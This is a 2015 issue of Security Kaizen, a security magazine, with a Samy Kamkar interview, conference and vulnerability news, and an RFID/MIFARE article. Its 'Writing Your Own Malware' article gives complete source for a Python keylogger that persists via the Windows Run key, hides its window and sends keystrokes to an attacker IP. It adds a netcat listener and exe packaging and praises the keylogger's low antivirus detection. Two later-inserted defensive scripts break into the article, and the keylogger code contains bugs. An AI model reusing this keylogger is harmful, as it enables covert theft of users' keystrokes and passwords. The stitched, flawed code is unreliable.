Security Kaizen Magazine, Issue 22


Vol.5 Issue 22 / 2015

Interview with Samy Kamkar, a privacy and security researcher

Journey to the wonders of ICS Security

Security of Radio Frequency Identification (RFID) Tags

www.bluekaizen.org





Contents

Interviews
6  Samy Kamkar, a privacy and security researcher

Grey Hat
10  Writing Your Own Malware

New & News
14  CSCAMP 2015
17  Bluekaizen News

Hardware Hacking
20  Security of Radio Frequency Identification (RFID) Tags
26  Journey to the wonders of ICS Security

Malware Analysis
32  GVOL: GUI app built in Java for the purpose of malware analysis

Reviews
35  CSXP Review

Magazine Team

Chairman & Editor-in-Chief: Moataz Salah
Editor: Mohamed H. Abdel Akher
Contributors: BK team, Ahmed Fouda, Khaled Sakr, May Medhat, Mohamed Shawky, Steevan, Vikram
Website Development: Mariam Samy
Marketing Coordinator: Mahitab Ahmed
Distribution: Ahmed Mohamed
Design: Medhat A. Albaky

Security Kaizen is issued bi-monthly. Reproduction in whole or in part without written permission is strictly prohibited. All copyrights are preserved to www.bluekaizen.org. For advertisement in Security Kaizen Magazine and the www.bluekaizen.org website, e-mail info@bluekaizen.org or phone +2 0100 267 5570 / +971 5695 40127.

Editor's Note

Those of you reading this magazine everywhere, welcome! Security Kaizen is unique in its ability to bring infosec professionals together at all levels of their careers. The theme of this issue is hardware security. In Egypt and the ME this field is quite rare compared with the other tracks of the information security profession.

Hardware becomes the enforcer for secure systems because it is used to ensure that only the authenticated user and software can access the processor. However, the current hardware design flow does not have security as a key design objective, so it is important to build our devices with security requirements in mind. We have a unique interview with Samy Kamkar, the car hacker who was able to unlock nearly any car with a device of his own. We also feature some unique articles on ICS security, radio frequency identification tags, and writing your own malware in Python. You might have heard about Cyber Talents, the first platform to assess and measure the skills of cyber security professionals all over the world in a unique way, through online games and challenges; we have started a crowdfunding campaign on Zoomal to raise 20,000 USD, and we hope you can support us, even by just sharing the idea. Lastly, we are honored to announce that Bluekaizen has signed an agreement with ISACA to be the first partner in the ME providing the Cyber Security Nexus (CSX) training, in March 2016. For further information, you can contact Training@bluekaizen.org.

Mohamed H. Abdel Akher, Editor of Security Kaizen Magazine



Interviews

Interview with Samy Kamkar, a privacy and security researcher

Can you please introduce yourself to Security Kaizen magazine readers (bio, experience, history)?

I originally learned software development and have always been interested in hacking and security, with a recent interest in hardware and radio frequency. I dropped out of high school and began working in technology early (around the age of 15).

BK Team



You've created a tool named Evercookie. Can you please give us an overview of it?

Evercookie is an API that allows persistent tracking of a user in a browser even after they've removed cookies. I developed it to demonstrate the issues that are in browsers and have already been exploited by corporations and governments with little knowledge by users. By creating it as free and open source, it shed light on the issue and allowed browser vendors to produce more effective controls for privacy for users.

Why did you get prohibited from using a computer for 3 years?

In 2005, when I was 19 years old, I released a worm onto MySpace, the number one site on the Internet at the time, that made a user add me as a friend and add the text "but most of all, samy is my hero" to their profile. The code would also copy itself to their profile, so if someone visited their profile, they would also add me as a friend and hero. Within a day, over one million users had added me, making it the fastest spreading virus of all time to date. MySpace had to shut down to remove the worm, and in 6 months I was raided by the Secret Service, and 6 years later I was banned from computers for three years.

You've demonstrated weaknesses in Visa, MasterCard and Europay credit cards with Near Field Communication (NFC) and Radio-Frequency Identification (RFID) chips. What were your major findings?

The issue is that while there is encryption within the NFC cards, the chips that perform decryption are readily available to anyone at little cost (under $100 USD) for merchants' Point of Sale systems. The chips are necessary to decrypt the communication and transfer the credit card to the gateway. Because anyone can purchase them, I was able to enhance existing software to decrypt additional credit cards and demonstrate stealing credit cards through a portable, wireless system.

Why did you create the Samy Worm, "the most infectious computer worm in existence"?

This was a prank as a 19 year old, and I had no idea it would spread as quickly as it did!

How were you able to take control of GM cars? Why did you choose GM cars specifically?

While I'm a fan of the cars GM is creating and the quality they produce, it's important to note that they have recently been a proponent of preventing researchers such as myself from investigating how the software works within their vehicles. They've requested that reverse engineering their software, similar to how I learned about the attack, should be illegal in the USA based on the DMCA (http://www.wired.com/2015/04/dmca-ownership-john-deere/). I believe my demonstration is important to show that by preventing researchers such as myself from investigating security in their products, the only ones left to find the issues are malicious users. My demonstration allowed GM to fix the issues for more than three million users who use their RemoteLink app, according to their site (https://www.onstar.com/us/en/services/remotelink.html); however, if I'm prevented from researching these issues, the only ones who will do the research illegally are criminals who will likely exploit consumers afterwards.



You revealed that you can attack BMW Remote, Mercedes-Benz mbrace, and Chrysler Uconnect. How is it possible?

The same way GM/OnStar RemoteLink was exploited: by exploiting mobile devices to join networks whose name they willingly share, and by performing SSL man-in-the-middle attacks.

How did you hack any garage door using a child's toy from Mattel? And how do we protect ourselves against garage hacking?

Many garages use a very limited key space, similar to the number of possible passwords you can use to get into a website. In combination with another attack I discovered on how the garages interpret these passwords, I was able to reprogram a Mattel toy to wirelessly send every possible password for garages in under 10 seconds, opening many of these fixed code garages.

Is it possible for every modern car to be hacked?

Every car I have tested, including models from 2015, has had vulnerabilities that I was able to exploit to, at the very least, unlock the vehicle after the user performed an unlock command from their own car remote.

What kinds of things do you do in your daily life to protect yourself?

I use different passwords for each website; however, many things are difficult to protect and I remain as vulnerable as anyone :)



As a security expert, how do you judge WikiLeaks' decision to publish the full database of Hacking Team data? How vulnerable are Arab governments after this kind of disclosure? Do you fear that the diffusion of their software could be used by criminal groups?

I believe the more important question is not whether criminals are using the information now, but whether they were using it before the data was ever released. As soon as the data was leaked, many patches and resolutions to the issues were released -- this seems like a good thing for the world as a whole. How long were organizations using these vulnerabilities to exploit users before it became leaked... who knows? That's what's much scarier than the short period of time criminals were able to abuse the data post-leak.

Could you tell us more about the company that you have founded?

I cofounded a Voice over IP company, Fonality, which produces phone systems for businesses.

Do different governments, including the US government, ask for your help in certain cyber crime cases? Examples?

Occasionally; however, I can't provide examples. I typically only work with companies I believe are producing a positive impact in the world.

How do you see the future of the security industry in the Middle East?

It will be similar to the rest of the world, with new vulnerabilities, and it will be important to secure each machine.

What is your advice for governments, users and organizations to stay secure?

Use strong passwords and encryption.




Grey Hat

Writing Your Own Malware

Khaled Sakr, Information Security Engineer @ Security Meter

1. Objective
Hello all. First I would like to set out our objectives and goals for this article: a small tutorial and example of how to write malware using Python. The target audience is the academic community, those who seek to understand the working details of everything and every tool they use, because in the end most tools are available online. Learning the details, however, is essential academically if you want to improve, and as we will see it is not rocket science: some malware can consist of just a few simple lines of code.


2. Introduction
I am going to discuss the basic structure of how to write malware, spyware or Trojans. We all know there are many types of malware, including rootkits, ransomware, keyloggers, etc. In this article we will start our tutorial with a keylogger spyware program that can infect a Windows machine permanently without the end user's knowledge. Writing a keylogger requires only basic coding skills. The programming language I will be using is Python, since it is very effective when it comes to such programs.

3. Program Structure
Before demonstrating the code, I will give a brief explanation of the functioning of the script and the way it works. The script has four main functions:
1. AddProgramToStartUp(): This function modifies a registry key called HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Entries in this key determine which programs run at the computer's startup or the user's login; this is the way to make the malware run permanently.
2. HideCmd(): This function hides any activity happening in the cmd window so that the user does not suspect anything.
3. SendToRemoteServer(): This function opens a socket-level connection to the attacking machine for the purpose of sending it the keystrokes.
4. GetKeyPressedAndSendIt(): This function receives the key pressed by the user and then sends it to the attacker using the function SendToRemoteServer().
Below is a little flowchart of the program structure.

[Flowchart of the program structure: nodes HideCmd, AddProgramToStartUp, KeyPressed? (Yes/No), SendToRemoteServer]

4. Python Source Code

#!/usr/bin/python
## PyHook and Pythoncom are responsible for getting keystrokes
import pyHook, pythoncom
## socket will be used for channel creation between victim and the attacker
import socket
## the next modules are used for windows functions like editing registry keys and the hide cmd function
import win32event, win32api, winerror, win32console, win32gui
from _winreg import *

def AddProgramToStartup(): ## Function Definition
    ## in python __file__ is an instance of the file path where it was executed, so if the user executed the file from the desktop, __file__ would be c:\users\username\desktop
    fp = os.path.dirname(os.path.realpath(__file__))
    ## next appending the filename "malware.py"
    file_name = "maleware.py"
    new_file_path = fp + "\\" + file_name
    ## keyVal is a raw string variable containing the registry key name.
    ## python raw strings are used in case we have \ in our strings
    keyVal = r'Software\Microsoft\Windows\CurrentVersion\Run'
    ## The next couple of lines add an entry in the registry key which will make our code run each time the user logs in.
    key2change = OpenKey(HKEY_CURRENT_USER, keyVal, 0, KEY_ALL_ACCESS)
    SetValueEx(key2change, "HacKeD", 0, REG_SZ, new_file_path)

## Creating and initializing a variable called data which will hold the keystrokes, and HOST_IP which is the attacker's IP
data = ''
HOST_IP = "192.168.4.78"

def SendToRemoteServer(): ## Function Definition
    global data ## Global variable which is the data to be sent
    # Create a TCP socket and connect to the attacker machine on port 500. These lines of code I believe most python users are aware of.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST_IP, 500))
    sock.send(data)
    sock.close()
    return True

def HideCmd(): ## Function Definition.
    window = win32console.GetConsoleWindow() ## Get a CMD
    win32gui.ShowWindow(window, 0) ## Hide the CMD shell (putting the value 0)
    return True

def GetKeyPressedAndSendIt(event): ## Function Definition
    global data ## Global variable data which will hold key strokes
    ## The next piece of IF statements is responsible for changing the ASCII value of the letters to characters.
    if event.Ascii == 13:
        keys = '<ENTER>'
    elif event.Ascii == 8:
        keys = '<BACK SPACE>'
    elif event.Ascii == 9:
        keys = '<TAB>'
    else:
        keys = chr(event.Ascii) ## if any letter is pressed get the character value of its ASCII.
    data = data + keys ## Put the key into the buffer
    HideCmd() ## Hide the CMD
    SendToRemoteServer() ## Send the key logs to the remote server

## Now after defining all the functions it's time for the main part which will be executed upon double clicking on the file.
## First it will call the AddProgramToStartUp() function.
AddProgramToStartup()
## The next part is to get key strokes from the keyboard. This can easily be done using pyhook and pythoncom
## The below link explains how to get mouse events and keyboard events using python (PyHook and Pythoncom modules)
## http://sourceforge.net/p/pyhook/wiki/PyHook_Tutorial/
hm = pyHook.HookManager()
## Call the function GetKeyPressedAndSendIt()
hm.KeyDown = GetKeyPressedAndSendIt()
hm.HookKeyboard()
pythoncom.PumpMessages()

• It is mandatory to have a listener implemented on the attacker machine on port 500 to receive the key logs; this can easily be done with bash:

#!/usr/bin/bash
while true
do
    nc -nlp 500 ## open a permanent listener on port 500 using nc
done

5. Python2EXE
As you can see, it is not complicated to write a personal keylogger, and the same applies to some malware. The challenge now is running the script we have written on a machine, such as Windows, where Python is not installed. The solution to this problem is PyInstaller, which converts a Python script into an executable file. You only need to download PyInstaller and run the command

pyinstaller --onefile <script>.py

in the cmd. As the screenshot of PyInstaller running shows, the output of the command is an exe file in the PyInstaller directory.
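Since the script above installs itself through the HKEY_CURRENT_USER Run key, that key is also the first place a defender should look. The following Python 3 script is an added example; it is not the article's code and is not in the author's GitHub repository. It reads the same Run key (on Windows; on other platforms it falls back to constructed sample entries) and flags any entry whose target is an interpreted script or lives in a user-writable folder such as the Desktop, which is exactly the footprint the keylogger leaves. The winreg module is the Python 3 name of the _winreg module the article imports; the HacKeD value name and the Desktop path follow the article, and the OneDrive entry is a constructed example of a normal autorun value.

```python
import sys

# The key the article's AddProgramToStartUp() writes to (same path, under HKEY_CURRENT_USER).
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Folders a normal user can write to without admin rights, i.e. where malware running
# as that user can drop itself.  Matched case-insensitively against the target path.
USER_WRITABLE_MARKERS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\desktop\\", "\\downloads\\")
# Interpreted scripts registered for autorun are unusual for legitimate software.
SCRIPT_EXTENSIONS = (".py", ".pyw", ".vbs", ".js", ".bat", ".cmd", ".ps1")


def extract_target(command):
    """Return the program path from a Run value, dropping surrounding quotes and arguments."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ")[0]


def classify_entry(command):
    """Return the reasons an autorun command looks suspicious (empty list: nothing flagged)."""
    target = extract_target(command).lower()
    reasons = []
    if any(marker in target for marker in USER_WRITABLE_MARKERS):
        reasons.append("target in user-writable path")
    if target.endswith(SCRIPT_EXTENSIONS):
        reasons.append("target is a script, not a compiled program")
    return reasons


def audit_run_entries(entries):
    """entries: iterable of (value_name, command).  Returns {value_name: [reasons]} for flagged entries."""
    flagged = {}
    for name, command in entries:
        reasons = classify_entry(command)
        if reasons:
            flagged[name] = reasons
    return flagged


def read_run_key():
    """Enumerate the HKCU Run key on Windows; other platforms have no registry, so return []."""
    if sys.platform != "win32":
        return []
    import winreg  # Python 3 name of the _winreg module the article imports
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once the index runs past the last value
                break
            entries.append((name, str(value)))
            index += 1
    return entries


# Constructed sample entries: a normal installed program and one matching the article's pattern.
SAMPLE_ENTRIES = [
    ("OneDrive", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    ("HacKeD", r"C:\Users\victim\Desktop\malware.py"),
]

if __name__ == "__main__":
    entries = read_run_key() or SAMPLE_ENTRIES
    for name, reasons in audit_run_entries(entries).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Run as an ordinary user on the victim machine it lists only the HacKeD entry, because the OneDrive path sits under Program Files and points at a compiled executable. The two heuristics are deliberately simple; a fuller audit would also cover the HKEY_LOCAL_MACHINE Run keys, RunOnce, and the Startup folder.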

6. Executable in action

After implementing both the keylogger and the listener, we check that they are working. I am using Linux Mint as the attacking machine and Windows 7 as the victim machine. I first run the bash listener using ./listener.sh. Then, when the user executes the file:
• First, an entry in the registry Run key is created.
• Then, the CMD window is hidden from the user.
• Finally, it captures the keystrokes and sends them to the attacker.
Now let's see these in action.

1. Adding the program to the computer's startup in /Software/Microsoft/Windows/CurrentVersion/Run.

2. Hiding the cmd so that the user does not notice the program's functioning. It can also be a minor program which runs along with the keylogger after being executed. The process malware.exe is running and the cmd did not alert the user because it was hidden.

3. The last step is receiving the keystrokes on my Linux Mint.

7. VirusTotal Detection Ratio
Since this is personal code, I am going to check its detection ratio by antivirus and antimalware products using VirusTotal.

Great! Our executable is detected by only two antiviruses (ClamAV, TheHacker), which means it gets past the most commonly used antiviruses such as Kaspersky, AVE and Nod32. Therefore, knowing how to write malware has a bonus value: besides learning the details of how malware operates, you also stand a lower chance of being detected by antiviruses.

Thanks for your time! To have a look at the source code, please visit my GitHub repository: https://github.com/HacKeD0x90/PythonKeyLogger
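The network side of the script is just as recognisable as the registry entry: SendToRemoteServer() opens a new TCP connection to port 500 for every single keystroke, and because the data buffer is never cleared, each send is one byte longer than the previous one. The Python 3 code below is an added example, not part of the article, showing how such a burst of tiny connections to one host and port can be picked out of connection records. The records and their one-line-per-connection format are constructed for the demonstration (real firewall or Zeek logs would need their own parser); the 192.168.4.78:500 destination is the address and port used in the article, and the thresholds are assumptions to be tuned per network.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection records (not real logs): "timestamp src dst dst_port bytes_sent",
# one line per TCP connection.  10.0.0.12 behaves like the article's keylogger: a new
# connection to 192.168.4.78:500 per keystroke, each one byte longer than the last because
# the script never empties its buffer.  10.0.0.20 shows ordinary HTTPS traffic and a burst
# of small name lookups, neither of which should be flagged.
SAMPLE_CONN_LOG = """\
2015-10-01T10:00:00 10.0.0.12 192.168.4.78 500 1
2015-10-01T10:00:01 10.0.0.12 192.168.4.78 500 2
2015-10-01T10:00:02 10.0.0.12 192.168.4.78 500 3
2015-10-01T10:00:03 10.0.0.12 192.168.4.78 500 4
2015-10-01T10:00:04 10.0.0.12 192.168.4.78 500 5
2015-10-01T10:00:05 10.0.0.12 192.168.4.78 500 6
2015-10-01T10:00:06 10.0.0.12 192.168.4.78 500 7
2015-10-01T10:00:07 10.0.0.12 192.168.4.78 500 8
2015-10-01T10:00:08 10.0.0.12 192.168.4.78 500 9
2015-10-01T10:00:09 10.0.0.12 192.168.4.78 500 10
2015-10-01T10:00:10 10.0.0.12 192.168.4.78 500 11
2015-10-01T10:00:11 10.0.0.12 192.168.4.78 500 12
2015-10-01T10:00:03 10.0.0.20 93.184.216.34 443 1824
2015-10-01T10:00:09 10.0.0.20 93.184.216.34 443 2210
2015-10-01T10:00:15 10.0.0.20 93.184.216.34 443 980
2015-10-01T10:00:00 10.0.0.20 10.0.0.1 53 41
2015-10-01T10:00:01 10.0.0.20 10.0.0.1 53 38
2015-10-01T10:00:02 10.0.0.20 10.0.0.1 53 44
2015-10-01T10:00:03 10.0.0.20 10.0.0.1 53 40
2015-10-01T10:00:04 10.0.0.20 10.0.0.1 53 39
2015-10-01T10:00:05 10.0.0.20 10.0.0.1 53 42
2015-10-01T10:00:06 10.0.0.20 10.0.0.1 53 37
2015-10-01T10:00:07 10.0.0.20 10.0.0.1 53 45
2015-10-01T10:00:08 10.0.0.20 10.0.0.1 53 40
2015-10-01T10:00:09 10.0.0.20 10.0.0.1 53 43
"""


def parse_conn_log(text):
    """Parse the constructed format into (timestamp, src, dst, port, bytes) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, port, nbytes = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(port), int(nbytes)))
    return records


def find_keystroke_exfil(records, window_seconds=60, min_conns=10, max_avg_bytes=8):
    """Flag flows with many tiny connections inside one time window.
    Returns {(src, dst, port): largest number of qualifying connections seen in a window}."""
    window = timedelta(seconds=window_seconds)
    flows = defaultdict(list)
    for ts, src, dst, port, nbytes in records:
        flows[(src, dst, port)].append((ts, nbytes))
    hits = {}
    for flow, conns in flows.items():
        conns.sort()
        best, start = 0, 0
        for end in range(len(conns)):
            # slide the window start forward until conns[start..end] fits in window_seconds
            while conns[end][0] - conns[start][0] > window:
                start += 1
            count = end - start + 1
            avg_bytes = sum(b for _, b in conns[start:end + 1]) / count
            if count >= min_conns and avg_bytes <= max_avg_bytes:
                best = max(best, count)
        if best:
            hits[flow] = best
    return hits


def detect_sample():
    """Run the detector over the constructed log; only the keylogger flow should come back."""
    return find_keystroke_exfil(parse_conn_log(SAMPLE_CONN_LOG))


if __name__ == "__main__":
    for (src, dst, port), count in detect_sample().items():
        print(f"{src} -> {dst}:{port}: {count} tiny connections within 60s, possible keystroke exfiltration")
```

The name-lookup burst is as frequent as the keylogger's traffic but fails the size test, and the HTTPS connections are too few, so only the 10.0.0.12 flow is reported. Both thresholds matter: a detector that counts connections alone would page on every busy DNS client.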



New & News

CSCAMP 2015

As many specialists in the security world know, the Cairo Security Camp is one of the biggest security conferences in the Middle East and North Africa (MENA region). This year it was once again held at the Intercontinental City Stars. Every year the conference gets bigger and bigger, bringing in more people and companies from all over the world.

Cairo Security Camp was held this year on September 19 and 20, and it brought the industry together for an exciting two days filled with discussions on the latest threats and solutions to industry-wide issues. There were top-notch talks spread across two tracks, ranging from in-depth analysis of technical topics to professional development and skill enhancement presentations.


This year the conference included different discussion sessions covering different aspects of the information security domain, including the cyber security skills crisis, encryption, malware analysis, business continuity, mobile security, and a view on financial cybercrimes in the Egyptian market from the Ministry of Interior.

A set of remarkable sessions on advanced topics and case studies was presented. One of them, by Adel Abdelmoneim, ITU/RCC Cyber Security Expert, discussed the ITU 5 pillars model for developing an NCS strategy, in addition to demonstrating important concepts such as IT assets, risk management, information assurance, business continuity and disaster recovery. The view on financial cybercrimes in the Egyptian market was presented by Major Mostafa Khidr from the Ministry of Interior.

After 5 years of holding CSCAMP, the sixth edition, CSCAMP2014, was a little different. This year we increased the activities to include a panel discussion, "Egypt Better Future: Search for the Young Talents", the announcement of a new generation of courses named after CSX (Cyber Security Nexus), security awards and others, besides two conference rooms: one only for workshops and the other for different security topics.

Another advanced session, by Osama Kamal, was about extreme logging: scaling out your logging infrastructure to handle huge volumes that traditional tools cannot handle anymore, showing best practices, tools and designs, all based on real-life experience. The workshop room on the first day was also presented by Mr. Ahmed Riad, who joined the conference by video, and Mr. Waleed Yasser; both introduced the concept of business continuity, its implementation and an overview of the BCI Good Practice Guidelines lifecycle. The OWASP Cairo chapter took part on the second day in the workshop room to present three main topics: Software Security Assurance, Mobile Application Security and Application Security Threat Modelling.


A new set of sessions named "Tech Talk" was introduced at this year's conference: five minutes to share your thoughts with the community.

We also introduced a group of Egyptian cyber security professionals who have managed to become part of a number of prestigious leading security firms, for a discussion panel named "Egypt Better Future: Search for the Young Talents". The discussion addressed the skills and education required to get hired by an international security company: what are their daily jobs, what challenges did they face to get hired, and what is their advice to the new generation of cyber security professionals? The discussion also produced ideas and suggestions to improve the Egyptian cyber security industry and how to use the most important asset in Egypt, which is human capacity.

Next year, expect more of the same: high quality, engaging talks from up-and-coming security leaders. You should put CSCAMP on your must-see list of security conferences.



New & News

News: A peek under the hood of the recent security breaches

Two Critical Vulnerabilities found in TrueCrypt
Two critical security vulnerabilities have been discovered in the famous encryption tool TrueCrypt that could expose a user's data to hackers if exploited. James Forshaw, a security researcher with Google's Project Zero, which looks for zero-day exploits, has found a pair of privilege elevation flaws in the TrueCrypt package. Reportedly, the TrueCrypt vulnerabilities would not directly allow an attacker to decrypt drive data. Instead, successful exploitation allows malware installation on the victim's machine, which would be enough to obtain TrueCrypt's decryption key and other sensitive data.
1- CVE-2015-7359: The Windows driver used by projects derived from TrueCrypt 7 (verified in VeraCrypt and CipherShed) is vulnerable to a local elevation of privilege attack through its handling of process impersonation tokens, which allows a user to inspect and potentially manipulate other users' mounted encrypted volumes on the same machine. https://code.google.com/p/google-security-research/issues/detail?id=537
2- CVE-2015-7358: The Windows driver used by projects derived from TrueCrypt 7 (verified in VeraCrypt and CipherShed) is vulnerable to a local elevation of privilege attack by abusing the drive letter symbolic link creation facilities to remap the main system drive. With the system drive remapped it is trivial to get a new process running under the local system account. https://code.google.com/p/google-security-research/issues/detail?id=538

BK Team



GCHQ's Smurf Army can hack smartphones, says Snowden
Smartphone users can do "very little" to stop security services getting "total control" over their devices, US whistleblower Edward Snowden has said. Snowden suggested spies could easily gain "total control" of smartphones by sending targets one simple text message. Once received, this allows spies to access a phone's camera to secretly take pictures or listen using its microphone. Speaking from Moscow, Snowden told BBC Panorama that GCHQ and the NSA "want to own your phone instead of you". He suggested British secret agents used a group of hacking tools called the "smurf suite" to get into their targets' smartphones.

"Dreamy Smurf is the power management tool which means turning your phone on and off with you knowing," he said. "Nosey Smurf is the 'hot mic' tool. For example if it's in your pocket, [GCHQ] can turn the microphone on and listen to everything that's going on around you - even if your phone is switched off because they've got the other tools for turning it on. Tracker Smurf is a geo-location tool which allows [GCHQ] to follow you with a greater precision than you would get from the typical triangulation of cellphone towers." He also described a spy app called Paranoid Smurf. "It's a self-protection tool that's used to armour [GCHQ's] manipulation of your phone," he added. Snowden added that the technology is provided by the United States National Security Agency (NSA), which provides "tasking and direction" to its UK counterpart and has spent $1 billion on a similar program itself in the US.



Hacking enterprise wireless printers with a drone or a vacuum cleaner

A group of researchers from iTrust, a research center at the Singapore University of Technology and Design, has demonstrated how to use a drone to intercept wireless printer transmissions from outside an office building. The drone carries a smartphone running two custom apps that can intercept the printer's wireless traffic, which contains sensitive data. The researchers accessed a corporate network by using a smartphone-equipped drone to hack internal printers. In the demo, they use a standard drone from the Chinese firm DJI and a Samsung smartphone. They developed two applications:
• First app: once an open wireless printer is detected, it establishes a bogus access point that mimics the printer and tricks computers on the internal wireless network into sending sensitive documents to it.
• Cybersecurity Patrol: detects open WiFi printers and automatically notifies the organisation's IT department so that it can mitigate the vulnerability.
The project's aim is to make businesses and organizations aware that their innocent-looking printers and vacuum cleaners can easily be hacked and hijacked by attackers trying to get into their corporate networks. Reference: http://itrust.sutd.edu.sg/research/projects/cyber-security-patrol/

WinRAR SFX v5.21 - Remote Code Execution Vulnerability
According to Mohammad Reza Espargham, a security researcher at Vulnerability-Lab, the stable version of WinRAR 5.21 for Windows computers is vulnerable to a Remote Code Execution (RCE) flaw. The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are able to generate their own compressed archives with malicious payloads to execute system-specific code for compromise: the attacker saves malicious HTML code in the SFX archive's input, which results in system-specific code execution when a target user or system opens the compressed archive. Exploitation of the code execution vulnerability requires low user interaction (opening the file), without a privileged system or restricted user account. http://seclists.org/fulldisclosure/2015/Sep/106



Hardware Hacking

Security of Radio Frequency Identification (RFID) Tags

Steevan, Information Security Engineer
Vikram, Senior Consultant at KPMG

The purpose of this article is to provide an insight into the explosive growth of wireless systems using RFID, which has led to the other side of the concern: securing the data on the fly. Although RFID tags are reasonably secure, they can still be used against you surreptitiously. Many technical challenges remain in the present age of wireless networks, which we will discuss in this article.


We have devices incorporating RFID that can be used by an end user for anything from a parent monitoring a baby's movements remotely to a government tracking weapons in transit. RFID is ubiquitous. A few of the fascinating uses are robbery-proof chips in casinos, loss-resistant golf balls, no-swipe ticket passes in amusement parks, identity data stored in humans and animals, smart fitting rooms that access product data and find similar alternatives, and anti-theft devices. Technology has paved the way for vast expansion in the wireless space. Wireless communications over the years has taken a paradigm shift in terms of the tremendous growth of the communications industry. Nowadays cellular phones have become a part of daily life for every individual, adding sophisticated features and technologies over the air. In addition, wired networks are being replaced with wireless sensor networks, from home broadband to remote monitoring using the technologies available.

"Every convenience comes at a cost"

RFID
Radio frequency identification is the use of wireless magnetic fields to transmit data for automatically identifying and tracking tags attached to objects. The tags contain electronically stored information. RFID technology has generated much hype in the past few years; the major driver for its development has been tagging physical objects, places and things with a radio chip so they can interface with computers. RFID technology is both hailed as the key to the "Internet of Things (IoT)" and condemned as an invasive surveillance technology, and in more extreme circles it is feared as the Mark of the Beast [1]. As RFID is ubiquitous, our objective is to provide an insight into it. Although RFID tags are reasonably secure, they can still be used against you surreptitiously.

Technical Overview
The technical infrastructure of RFID consists of a radio transponder and a receiver, also known as the tag and the reader. Information is stored on a tag and is transmitted to a reader over a radio frequency (RF) connection. The reader in turn connects via a wireless or wired network to a server hosting the RFID application that makes use of the transmitted data; in supply chain applications, a middleware layer manages the RFID data flow between readers and the enterprise application.

RFID Tags
Tags contain a microchip and a transponder. The microchip stores data related to the object and the transponder transmits that data to readers. The data is written on the tag along with a unique identifier code at the point of manufacture (factory programming), but can also be programmed by an OEM or end user (field programming). Tags are either passive or active. Passive tags are smaller, about the size of a grain of rice, and getting smaller. They are activated when they enter the range of a reader's signal: the reader's antenna sends power to the transponder, activating the data stream. Passive tags are much smaller in size and memory than active tags and are cheaper to manufacture.

RF Connection
Tags transmit data to readers over different radio frequencies, depending on the application's needs. RF frequencies are divided into several bands, including low frequency (LF), high frequency (HF), ultra-high frequency (UHF), and microwave. Passive tags transmit at all frequencies, while active tags transmit at the higher frequencies only. The exact frequencies that may be used within the various bands, as well as the power (output) levels, are controlled by the regulatory body of each country. Each frequency varies in terms of regulation, performance, size and cost of the associated technology.


MIFARE RFID hacks

Algorithm used for encryption

One of the most common RFID cards is the MIFARE Classic, produced by NXP Semiconductors. The MIFARE Classic card family, which covers public transport, access management, loyalty cards etc., is passive and fully compliant with ISO/IEC 14443 Type A. For cryptographic purposes, the MIFARE Classic cards use the CRYPTO1 cipher. This is a proprietary encryption algorithm developed by NXP, based on the Hitag2 algorithm. CRYPTO1 is used in HITAG RFID systems and the details of the algorithm were kept secret by the manufacturer, an approach called "security through obscurity". Eventually, the hackers Nohl and Plötz from the Chaos Computer Club (CCC) in Berlin discovered the algorithm by reverse engineering.

From the reverse engineering of the chip, it was known that the crypto logic had only one input, and that both the UID and the key were fed into it, so the two had to be combined somehow; the suspected combination was XOR. To test this theory, the first bit of the UID as well as the first bit of the key were flipped. If they were combined via XOR, this should still produce the same value. The card responded again, which confirmed to the team that the XOR theory was correct. Through further testing, they found that the first five bits of the UID and the key are connected directly, meaning the nth bit of the UID is connected to the nth bit of the key; for the other bits the relationship is different. Another discovery made while testing the radio protocol was that the algorithm uses a pseudo random number generator (PRNG) realized with a linear feedback shift register (LFSR). In general terms, an LFSR creates a sequence of numbers that appear random. It always starts with the same number and moves to the next number at the same rate, so the nth output of a given LFSR is always the same. The challenge of using an LFSR in a passive RFID tag is that the card relies on the reader for its power supply: every time the card is removed from the reader it loses power, and as soon as it is supplied with energy again the LFSR restarts from its initialization sequence, producing the same numbers at the same rate as the last time. This was proved in an experiment by the CCC. They put the card next to the reader and switched the reader on. After the card is supplied with energy and starts generating random numbers, it always takes approximately the same time until the reader starts communicating. In this experiment, they obtained the same random values from the LFSR in 12 out of 27 attempts.

The MIFARE Classic 1K chip has 1K of EEPROM memory, divided into 16 sectors of 4 blocks each, with each block containing 16 bytes, making a total of 64 blocks. The 4K version offers 4K of EEPROM memory divided into 256 blocks, where 32 sectors have 4 blocks and an additional 8 sectors have 16 blocks. The first block contains the unique identification number (UID) of the card as well as some vendor-specific data, and is write protected. The last block of each sector, the sector trailer, holds the access keys and access rules and is not intended to store user data. Before any memory operation is allowed on a sector, a reader has to authenticate itself for that sector; hence the sector trailer contains two secret keys, A and B, which are used for authentication. The access conditions located in the same block specify which memory operations are allowed on the sector. The sector trailer itself has specific access conditions. Key A is never readable; key B can be configured as readable or non-readable. If it is declared readable, only key A can be used for authentication and key B is used to store data. There is also a single byte, U, which has no defined purpose. The data blocks are used to store information for the application. For example, a cafeteria card could hold the name of the owner plus the current balance of the card.

Figure: MIFARE Classic 4K register and block structure

